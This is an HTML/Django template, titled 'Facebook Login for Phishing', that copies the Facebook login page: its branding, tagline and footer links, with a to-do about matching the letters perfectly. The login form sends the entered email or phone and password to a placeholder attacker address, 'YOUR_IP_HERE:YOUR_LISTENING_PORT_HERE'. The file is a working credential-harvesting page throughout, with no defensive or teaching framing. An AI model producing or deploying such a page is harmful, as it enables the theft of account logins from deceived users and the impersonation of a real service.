<!-- To-DO: 
* Finish JS function to change input fields on click.
* Find letters that match perfectly.
* Test page.

-->
<!DOCTYPE html>  
<html lang="en">  
    <title>Facebook Login for Phishing</title>
    <head>  
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        
        <title>Login</title>  
        
        {% load static %}  
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
        <link rel="stylesheet" type="text/css" href="{% static 'css/styles.css' %}">

        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.1.0/css/bootstrap.min.css" crossorigin="anonymous" referrerpolicy="no-referrer" />
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer" />
        <link rel=”stylesheet” href=”https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css” />
        <link rel=”stylesheet” href=”https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css” integrity=”sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T” crossorigin=”anonymous”>
        
        <style> 
            /* .header { 
                position: absolute;
                top: 0;
                left: 0;
                width: 100%;
                height: 414px; 
                background-color: #969393;
                color: #fff;
                text-align: center;
                padding: 20px;
                box-sizing: border-box;
            } */

            .header {
                background: #fff;
                color: #343a46;            
                height: 1020px;
                position: relative;
                z-index: 1;
                width: 100%;
                max-width: 100%;
                text-align: center;
            }

            .header2 {
                height: 85%;
                background: #F0F2F5;
                color: #978364;
                position: relative;
                z-index: 5;
                width: 100%;
                max-width: 100%;
            }


            .card {
                border-radius: 10px;
            }


            .custom-btn {
                width: 34px;
                height: 12px;
                border: 1px #CCD0D5;
                border-style: solid;
                border-color: #CCD0D5;
                background-color: #F5F6F7;
                top: 15px;
                right: 85px;
                position: relative;
                color: #F5F6F7;
            }

           .plus-sign {
                color: #686F7E;
                font-size: 2.13em;
                font-weight: 750;
                position: relative;
                right: 8px;
                bottom: 25px;
           }

          input[type="text"],
          textarea {
                transition: all 0.30s ease-in-out;
                outline: none;
                border: 1px solid rgba(0, 31, 153, 1)
          }
           
          input[type="text"],
          textarea:focus {
                box-shadow: 0 0 1px rgba(0, 31, 153, 1);
                border: 0.25px solid rgba(0, 31, 153, 1);
            }

            .form-control:focus {

            }

           .container {
                max-width: 1210px;
                margin: 0 auto;
            }

            .grid-row {
                display: flex;
                flex-flow: row wrap;
                justify-content: flex-start;
            }

            
        </style>


                
        <div class="header">

            <div class="header2">

                <div class="container">
                    <div class="grid-row">
                        <center><div class="text" style="color: #316FF6; position: relative; top: 185px; font-weight: 800; font-size: 3.8em; font-family: 'Tahoma', sans serif; left: 140px;">facebook</h1></div></center>
                        <center><div class="text" style="text-align: left; position: relative; top: 275px; color: black; font-size: x-large; font-weight: 400; line-height: 1; left: -140px; font-size: 1.9em;" >Connect with friends and the world <br>around you on Facebook.</div></center>
                    </div>
                </div>
                

                <center><div id="Login-Card" class="card" style="left: 290px; position: relative; top: 43px; height: 352px; width: 385px; box-shadow: 0 0 11px; color: rgb(187, 183, 183);">

                    <form action="http://YOUR_IP_HERE:YOUR_LISTENING_PORT_HERE/" class="form-control">
                        {% csrf_token %}
                        <fieldset>
                            
                            <input class="form-control" type="text" name="email/phone" id="field1" placeholder="Email or phone number" style="border-radius: 0px; width: 355px; height: 50px; top: 20px; position: relative;" >
                            <input class="form-control" type="text" name="password" id="field2" placeholder="Password" style="border-radius: 0px; width: 355px; height: 50px; top: 30px; position: relative; ">


                            <button class="btn btn-primary" style="top: 47px; position: relative; width: 355px; height: 45px; font-size: larger; font-weight: 680; border-radius: 5px;">Log In</button>
                            <br>
                            <a href="/forgot_password/" style="top: 60px; position: relative; font: 0.88em sans-serif; text-decoration: none;" >Forgot Password?</a>

                            <div class="line" style="border-top: 1px solid #888; position: relative; top: 90px; width: 90%; color: rgb(181, 179, 179); opacity: 0.25;"></div>

                            <button class="btn btn-success" style="font-weight: 500; top: 108px; position: relative; background-color: #42B72A; height: 46px; width: 195px; font-size: large; border-radius: 5px;">Create new account</button>

                            <div class="text" style="top: 160px; position: relative; font: 0.9em sans-serif; color: black;"><b>Create a page </b>for a celebrity, brand or business.</div>
                        </fieldset>
                    </form>
                </div></center>
            </div>

            <!-- All below go into the bottom section of the page for the center function. -->
            <center>
                <div class="container" style="text-align: left; text-wrap:wrap; flex-flow: wrap; justify-content: flex-start">
                    <div class="grid-row">
                        <a href="" style="left: 115px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">English (US)</a>
                        <a href="" style="left: 123px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration:none;  text-align: left;">Français</a>
                        <a href="" style="left: 127px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration:none; text-align: left;">(Canada)</a>
                        <a href="" style="left: 134px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">Español</a>
                        <a href="" style="left: 140px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">中文</a>
                        <a href="" style="left: 144px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">(简体)</a>
                        <a href="" style="left: 149px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">한국어</a>
                        <a href="" style="left: 154px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">日本語</a>
                        <a href="" style="left: 161px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">Português</a>
                        <a href="" style="left: 165px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">(Brasil)</a>
                        <a href="" style="left: 172px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">Deutsch</a>
                        <a href="" style="left: 178px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">Italiano</a>
                        <a href="" style="left: 184px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">العربية</a>
                        <a href="" style="left: 189px; bottom: -25px; position: relative; font-size: 0.8em; color: #838588; text-decoration: none; text-align: left;">हिन्दी</a>
                        <button class="custom-btn btn btn-primary" onclick="" style="left: 195px; bottom: 0px; position: relative; top: 25px; height: 20px; text-align: left;">
                            <center><span class="plus-sign" style="font-size: 1.8em; position: relative; top: -22px; right: 5px;">+</span></center>
                        </button>
                    </div>
                </div>
                
                
                <div class="line" style="border-top: 1px solid #888; position: relative; bottom: -200px; width: 63%; color: rgb(181, 179, 179); opacity: 0.25; top: 30px;"></div>

                <!-- Turn each of the below links to class's, class=link or text.... then add the on hover stylings in the <head> <style> section. -->
                
                <div class="container" style="text-align: left; text-wrap:wrap; flex-flow: wrap; justify-content: flex-start;">
                    <div class="grid-row">
                        <a href="" style="left: 115px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Sign Up</a>
                        <a href="" style="left: 143px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;;">Log In</a>
                        <a href="" style="left: 160px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;;">Messenger</a>            
                        <a href="" style="left: 170px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Facebook Lite</a>
                        <a href="" style="left: 188px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Video</a>
                        <a href="" style="left: 205px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Places</a>
                        <a href="" style="left: 225px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Games</a>
                        <a href="" style="left: 238px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Marketplace</a>
                        <a href="" style="left: 255px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Meta Pay</a>
                        <a href="" style="left: 275px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Meta Store</a>
                        <a href="" style="left: 295px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Meta Quest</a>
                        <a href="" style="left: 310px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Meta AI</a>
                        <a href="" style="left: 330px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Instagram</a>
                        <a href="" style="left: 345px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Threads</a>
                    </div>
                </div>


                <div class="container" style="text-align: left; text-wrap:wrap; flex-flow: wrap; justify-content: flex-start">
                    <div class="grid-row">
                        <a href="" style="left: 115px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Fundraisers</a>
                        <a href="" style="left: 143px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Services</a>
                        <a href="" style="left: 160px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Voting Information Center</a>
                        <a href="" style="left: 170px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Privacy Policy</a>
                        <a href="" style="left: 188px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Privacy Center</a>
                        <a href="" style="left: 205px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Groups</a>
                        <a href="" style="left: 225px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">About</a>
                        <a href="" style="left: 238px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Create ad</a>
                        <a href="" style="left: 255px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Create Page</a>
                        <a href="" style="left: 275px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Developers</a>
                        <a href="" style="left: 295px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Careers</a>
                        <a href="" style="left: 310px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Cookies</a>
                    </div>
                </div>

                <div class="container" style="text-align: left; text-wrap:wrap; flex-flow: wrap; justify-content: flex-start;">
                    <div class="grid-row">
                        <a href="" style="left: 115px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Ad Choices</a>
                        <a href="" style="left: 143px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Terms</a>
                        <a href="" style="left: 160px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Help</a>
                        <a href="" style="left: 170px; bottom: -35px; position: relative; font-size: 0.77em; color: #838588; text-decoration: none; font-weight: 425;">Contact Uploading & Non-Users</a>
                        <div class="text" style="left: -180px; bottom: -60px; position: relative; font-size: 0.78em; color: #838588; text-decoration: none; font-weight: 425;">Meta © 2024</div>
                    </div>
                </div>
            </center>


       </div>



    </head>  

    <body>       

    </body>



    <footer>

        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

    </footer>


    {% block content %} 
    {% endblock content %}


</html>

